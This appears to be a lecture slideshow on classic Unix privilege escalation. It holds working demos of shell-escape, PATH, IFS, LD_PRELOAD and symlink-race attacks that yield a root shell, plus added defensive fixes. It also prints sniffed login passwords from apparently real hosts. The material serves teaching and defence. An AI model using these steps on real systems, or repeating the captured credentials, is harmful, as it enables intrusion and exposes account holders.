Classical Hacking technique - PowerPoint PPT Presentation

1
Classical Hacking technique
  • Taeho Oh
  • http//postech.edu/ohhara
  • ohhara_at_postech.edu

2
Contents (1)
  • Physical attack
  • Social engineering
  • Shell escape
  • PATH attack
  • IFS attack
  • LD_PRELOAD attack
  • Race condition

3
Contents (2)
  • Buffer overflow
  • Sniff
  • IP Spoof
  • Misconfiguration

4
Physical attack
  • Search for passwords on the admin's desk
  • Steal a hard disk or a computer
  • Break the door with a hammer

5
Social engineering
  • Ask the admin for the admin's password
  • Send all users an email telling them to change
    their password

6
Shell escape (1)
  • Try to get a shell from a program by using shell
    escape characters
  • Ex) ; ! ( ) ...

7
Shell escape (2)
    ohhara@ohhara 1 $ cat ex_finger.c
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    int main(int argc, char *argv[])
    {
      char cmd[100];
      setuid(0);
      setgid(0);
8
Shell escape (3)
      if(argc>1)
      {
        /* argv[1] is pasted into a command line and handed to the shell */
        sprintf(cmd,"/usr/bin/finger %s",argv[1]);
        system(cmd);
      }
      return 0;
    }
    ohhara@ohhara 2 $ ls -l ex_finger
    ---s--x--x 1 root root 22961 Jan 3 19:33 ex_finger
9
Shell escape (4)
    ohhara@ohhara 3 $ ./ex_finger 'bin;/bin/sh'
    Login name: bin                         Directory: /usr/bin
    Never logged in.
    Mail last read Fri Dec 31 17:50:28 1999
    No Plan.
    # whoami
    root
Execute /usr/bin/finger bin;/bin/sh
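The defence against the shell escape above is to keep user input away from the shell altogether. The following program is an added example (not code from the slides): a finger wrapper that first checks the argument against a strict allow-list of login-name characters and then starts finger with execv() and a fixed argument vector, so no shell ever parses the text. The path /usr/bin/finger comes from the slide; the function names and the 32-character limit are assumptions for this example.

```c
/* Added example: a set-user-ID finger wrapper without a shell escape.
 * Defence 1: strict allow-list on the user name (rejects ';', '|', '&',
 *            '(', ')', quotes, spaces, ...).
 * Defence 2: execv() with a fixed argv, so the name is exactly one
 *            argument and is never re-parsed by /bin/sh. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Return 1 if s looks like a login name: 1..32 chars from [A-Za-z0-9._-]
 * and not starting with '-' (so finger cannot read it as an option). */
int valid_username(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > 32 || s[0] == '-')
        return 0;
    for (size_t i = 0; i < n; i++) {
        char c = s[i];
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '.' || c == '_' || c == '-'))
            return 0;
    }
    return 1;
}

/* Run /usr/bin/finger on one validated user without going through a shell.
 * Returns finger's exit status, or -1 on invalid input or exec failure. */
int safe_finger(const char *user)
{
    if (!valid_username(user))
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Fixed argv: whatever the string contains, it stays one argument. */
        char *const argv[] = { "finger", (char *)user, NULL };
        execv("/usr/bin/finger", argv);
        _exit(127);                     /* only reached if execv fails */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char *argv[])
{
    if (argc != 2 || !valid_username(argv[1])) {
        fprintf(stderr, "usage: %s <login-name>\n", argv[0]);
        return 1;
    }
    return safe_finger(argv[1]) == 0 ? 0 : 1;
}
```

With this wrapper, the slide's input 'bin;/bin/sh' is rejected before any process is started, and even an input that slipped past the check could only ever be an argument to finger, never a second command.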
10
PATH attack (1)
  • PATH is the search path for executable programs
  • PATH can be changed by the hacker

11
PATH attack (2)
    ohhara@ohhara 1 $ cat ex_who.c
    #include <stdlib.h>
    #include <unistd.h>
    int main(void)
    {
      setuid(0);
      setgid(0);
      system("who");   /* relative name: found through the caller's PATH */
      return 0;
    }
    ohhara@ohhara 2 $ ls -l ex_who
    ---s--s--x 1 root root 3136 Mar 6 17:29 ex_who
12
PATH attack (3)
    ohhara@ohhara 3 $ cat who
    #!/bin/sh
    /bin/sh
    ohhara@ohhara 4 $ PATH=.:$PATH
    ohhara@ohhara 5 $ export PATH
    ohhara@ohhara 6 $ ./ex_who
    # whoami
    root
Execute not /usr/bin/who but ./who
13
IFS attack (1)
  • IFS is the Internal Field Separator
  • Command arguments are separated by the IFS value
  • Default IFS value is whitespace (space, tab, newline)
  • Ex)
  • ls -al -> ls -al ( IFS=' ' )
  • ls/-al -> ls -al ( IFS=/ )

14
IFS attack (2)
    ohhara@ohhara 1 $ cat ex_date.c
    #include <stdlib.h>
    #include <unistd.h>
    int main(void)
    {
      setuid(0);
      setgid(0);
      system("/bin/date");   /* absolute path, but still parsed by /bin/sh */
      return 0;
    }
    ohhara@ohhara 2 $ ls -l ex_date
    ---s--x--x 1 root root 22811 Jan 3 21:19 ex_date
15
IFS attack (3)
    ohhara@ohhara 3 $ cat bin
    #!/bin/sh
    IFS=' '
    export IFS
    /bin/sh
    ohhara@ohhara 4 $ IFS=/
    ohhara@ohhara 5 $ export IFS
    ohhara@ohhara 6 $ PATH=.:$PATH
    ohhara@ohhara 7 $ export PATH
16
IFS attack (4)
    ohhara@ohhara 8 $ ./ex_date
    # whoami
    root
Execute not /bin/date but bin date (with IFS=/ the shell splits "/bin/date"
into the command bin and the argument date)
17
LD_PRELOAD attack (1)
  • LD_LIBRARY_PATH is the dynamic link library search path
  • LD_PRELOAD lists dynamic link libraries which are
    loaded before the LD_LIBRARY_PATH libraries

18
LD_PRELOAD attack (2)
    ohhara@ohhara 1 $ cat ex_print.c
    #include <stdio.h>
    #include <unistd.h>
    int main(void)
    {
      setuid(0);
      setgid(0);
      printf("hello!\n");   /* resolved at run time by the dynamic linker */
      return 0;
    }
    ohhara@ohhara 2 $ ls -l ex_print
    ---s--x--x 1 root root 4290 Jan 3 21:48 ex_print
19
LD_PRELOAD attack (3)
    ohhara@ohhara 3 $ cat ex_print_so.c
    #include <unistd.h>
    void printf(char *str)
    {
      execl("/bin/sh","sh",(char *)0);
    }
    ohhara@ohhara 4 $ gcc -shared -o ex_print_so.so ex_print_so.c
    ohhara@ohhara 5 $ LD_PRELOAD=./ex_print_so.so
    ohhara@ohhara 6 $ export LD_PRELOAD
20
LD_PRELOAD attack (4)
    ohhara@ohhara 7 $ ./ex_print
    # whoami
    root
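The PATH, IFS and LD_PRELOAD attacks on slides 10 through 20 share one root cause: a privileged program trusts environment variables that the invoking user controls. The usual fix is for the set-user-ID program to rebuild its environment before it executes anything. The code below is an added example, not from the slides; the variable names it filters and the fixed PATH value are assumptions for this example. One caveat a practitioner should know: current glibc already ignores LD_PRELOAD and LD_LIBRARY_PATH when a set-user-ID program itself starts (secure-execution mode), but any program that the privileged process then launches with system() or exec inherits whatever environment it passes along, so the filtering still matters there.

```c
/* Added example: sanitise the environment a set-user-ID program passes to
 * the programs it launches.  Everything that steers how the shell or the
 * dynamic loader finds code is dropped and a fixed PATH is installed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SAFE_PATH "PATH=/usr/bin:/bin"   /* assumed safe value for this example */

/* Variables whose value must never come from the invoking user. */
static int is_dangerous_var(const char *entry)
{
    static const char *const prefixes[] = {
        "LD_",          /* LD_PRELOAD, LD_LIBRARY_PATH, LD_AUDIT, ... */
        "IFS=",         /* word splitting inside system() / popen() */
        "PATH=",        /* where a relative command name is looked up */
        "ENV=",         /* sh/ksh start-up file */
        "BASH_ENV=",    /* bash start-up file for non-interactive shells */
        "SHELLOPTS=",
        NULL
    };
    for (int i = 0; prefixes[i]; i++)
        if (strncmp(entry, prefixes[i], strlen(prefixes[i])) == 0)
            return 1;
    return 0;
}

/* Build a filtered copy of envp: dangerous entries removed, SAFE_PATH
 * appended.  The caller frees the returned array (entries are shared). */
char **build_safe_env(char *const envp[])
{
    size_t n = 0;
    while (envp[n])
        n++;

    char **out = calloc(n + 2, sizeof *out);   /* +1 for PATH, +1 terminator */
    if (!out)
        return NULL;

    size_t k = 0;
    for (size_t i = 0; i < n; i++)
        if (!is_dangerous_var(envp[i]))
            out[k++] = envp[i];
    out[k++] = SAFE_PATH;
    out[k] = NULL;
    return out;
}

/* Return 1 if the NULL-terminated env contains a variable with this name. */
int env_has(char *const env[], const char *name)
{
    size_t len = strlen(name);
    for (size_t i = 0; env[i]; i++)
        if (strncmp(env[i], name, len) == 0 && env[i][len] == '=')
            return 1;
    return 0;
}

extern char **environ;

int main(void)
{
    /* Print the environment a child started by this program would receive;
     * pass it to execve() instead of relying on system(). */
    char **env = build_safe_env(environ);
    if (!env)
        return 1;
    for (size_t i = 0; env[i]; i++)
        puts(env[i]);
    free(env);
    return 0;
}
```

Combined with absolute paths in exec calls (and preferably execve() rather than system(), so no shell is involved at all), this removes the three footholds used above: ./who is no longer on the search path, "/bin/date" is no longer split at "/", and no user-chosen library is preloaded into children.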
21
Race condition (1)
  • A race condition occurs when two or more
    processes try to use one resource
  • Race conditions in UNIX security occur in
    the file system.

22
Race condition (2)
    Normal process                     Attack process
    access("good", W_OK)
                                       Remove good
                                       Link good to /.rhosts
    open("good", O_WRONLY)
    Write to not good but /.rhosts
23
Race condition (3)
    ohhara@ohhara 1 $ cat ex_race.c
    #include <stdio.h>
    #include <unistd.h>
    #include <fcntl.h>
    int main(void)
    {
      int fd;
      char data[] = " \n";
      setuid(0);
      setgid(0);
24
Race condition (4)
      if(access("good",W_OK)==0)
      {
        sleep(3);   /* the window between the check and the open */
        fd=open("good",O_WRONLY|O_TRUNC|O_CREAT);
        write(fd,data,4);
        close(fd);
      }
      return 0;
    }
    ohhara@ohhara 2 $ ls -l ex_race
    ---s--x--x 1 root root 4728 Jan 4 13:23 ex_race
25
Race condition (5)
    ohhara@ohhara 3 $ ls -l /.rhosts
    ls: /.rhosts: No such file or directory
    ohhara@ohhara 4 $ touch good
    ohhara@ohhara 5 $ ./ex_race & ln -sf /.rhosts good
    ohhara@ohhara 6 $ cat /.rhosts
    ohhara@ohhara 7 $ rlogin -l root localhost
    # whoami
    root
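The flaw in ex_race.c is the gap between access() and open(): the check is made on a name, and the name can point somewhere else by the time it is used. The following added example (not from the slides) closes that gap in two ways. It drops to the real user's identity and lets the kernel perform the permission check inside open() itself, so no separate access() call is needed, and it opens with O_NOFOLLOW and then inspects the descriptor with fstat(), so a symbolic link planted by another process is refused. The file names, the temporary directory and the demo() helper are constructed for the demonstration.

```c
/* Added example: a check-and-use that cannot be raced through a symlink. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open path for writing on behalf of the real user.  Returns a descriptor,
 * or -1 if the path is a symlink, not a regular file, or not writable. */
int safe_open_for_write(const char *path)
{
    uid_t saved_euid = geteuid();

    /* Become the invoking user for the open(): the kernel now applies that
     * user's permissions atomically with the open, replacing access(). */
    if (seteuid(getuid()) < 0)
        return -1;

    int fd = open(path, O_WRONLY | O_NOFOLLOW);   /* ELOOP if path is a symlink */

    seteuid(saved_euid);                          /* restore privilege */
    if (fd < 0)
        return -1;

    /* Inspect the object actually opened, not the name. */
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Demonstration in a fresh temporary directory: a regular file "good" and
 * a symlink "good_link" pointing at "rhosts" (standing in for /.rhosts).
 * Returns 1 when the regular file opens and the symlink is refused. */
int demo(void)
{
    char dir[] = "/tmp/raceXXXXXX";
    if (!mkdtemp(dir))
        return 0;

    char good[256], link[256], target[256];
    snprintf(good, sizeof good, "%s/good", dir);
    snprintf(link, sizeof link, "%s/good_link", dir);
    snprintf(target, sizeof target, "%s/rhosts", dir);

    int g = open(good, O_WRONLY | O_CREAT, 0600);
    int t = open(target, O_WRONLY | O_CREAT, 0600);
    if (g < 0 || t < 0)
        return 0;
    close(g);
    close(t);
    symlink(target, link);              /* the "ln -sf /.rhosts good" step */

    int fd_regular = safe_open_for_write(good);
    int fd_symlink = safe_open_for_write(link);
    int result = fd_regular >= 0 && fd_symlink == -1;
    if (fd_regular >= 0)
        close(fd_regular);

    unlink(good);
    unlink(link);
    unlink(target);
    rmdir(dir);
    return result;
}

int main(void)
{
    printf("symlink refused, regular file accepted: %s\n", demo() ? "yes" : "no");
    return 0;
}
```

Even if the attacker swaps "good" for a link between any two lines here, the write lands either on a regular file the real user may write or nowhere at all; the sleep(3) in ex_race.c only made the original window easy to hit, it did not create it.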
26
Buffer overflow (1)
  • Write to unexpected memory areas by overflowing a
    buffer
  • The most famous hacking technique
  • In almost all cases, buffer overflow means stack
    buffer overflow
  • Recently, the heap buffer overflow attack has been
    introduced

27
Buffer overflow (2)
  • Hackers can execute arbitrary commands by
    overflowing a buffer
  • Machine- and OS-dependent hacking technique
  • This topic will be discussed later

28
Sniff (1)
  • Ethernet broadcasts to transmit data
  • Hackers can see all network packets on the
    ethernet
  • Network packets contain user IDs, passwords, and
    other useful information
  • The easiest and the most powerful hacking
    technique

29
Sniff (2)
  (Diagram: normal network packet; broadcasted network packet;
  hacker can see network packet)
30
Sniff (3)
    # whoami
    root
    # hostname
    gdt.postech.ac.kr
31
Sniff (4)
    # cat tcp.log
    cogs.postech.ac.kr > mx1.postech.ac.kr 110
    USER nllbut
    PASS cjPpS!
    UIDL
    STAT
    QUIT
    ----- FIN
32
Sniff (5)
    211.33.152.182 > monsky.postech.ac.kr 23
    'vt100!ohhara zXfYpZgAd/!
    ----- Timed Out
33
IP spoof
  • Hackers can spoof their IP address
  • Hackers try to connect to rsh and rlogin services
    with a spoofed IP address
  • Hackers have to know the next sequence number to
    open a TCP session with a spoofed IP address
  • This topic will be discussed later

34
Misconfiguration
  • Hackers search for the admin's mistakes
  • Ex)
  • Null/simple password accounts
  • NFS export to everyone
  • Writable ftp home directory
  • Open X window display